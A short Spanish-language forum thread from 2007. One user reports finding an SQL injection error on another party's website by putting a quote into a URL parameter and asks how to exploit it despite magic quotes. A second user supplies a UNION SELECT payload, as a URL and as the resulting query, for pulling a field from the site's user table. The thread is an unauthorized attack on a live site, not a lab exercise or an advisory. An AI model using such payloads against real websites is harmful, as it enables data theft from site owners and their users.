Inyección sql

Iniciado por IMAC, 11 Diciembre 2007, 19:50 PM

0 Miembros y 1 Visitante están viendo este tema.

IMAC

Buenas, he posteado esto antes en la sección de programación, pero creo que me equivoqué de lugar. Espero que este sea el adecuado.

La cuestión es que mirando una página me encontré con esta url:
https://unaweb.com/ver.php?id=202

Y entonces me planté probar su seguridad con esta tontada:
https://unaweb.com/ver.php?id='a'

Y fue entonces cuando saltó el siguiente error:
SELECT id_user FROM user WHERE status = 1 AND id_pagina =\'a\'
You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'a\'' at line 1


Con esto veo que tiene magic cuotes activado o bien alguna función que inhabilita los caracteres especiales '.

Me preguntaba sin con esta información de la tabla, la fila y demás podría llevar a cabo alguna acción a pesar de las magic cuotes.

Saludos.

Thor

Con tal de no usar las comillas....
https://unaweb.com/ver.php?id=1 union select campo from user /*
SELECT id_user FROM user WHERE status = 1 AND id_pagina =1 union select campo from user /*

Creo que debería funcionar  :-\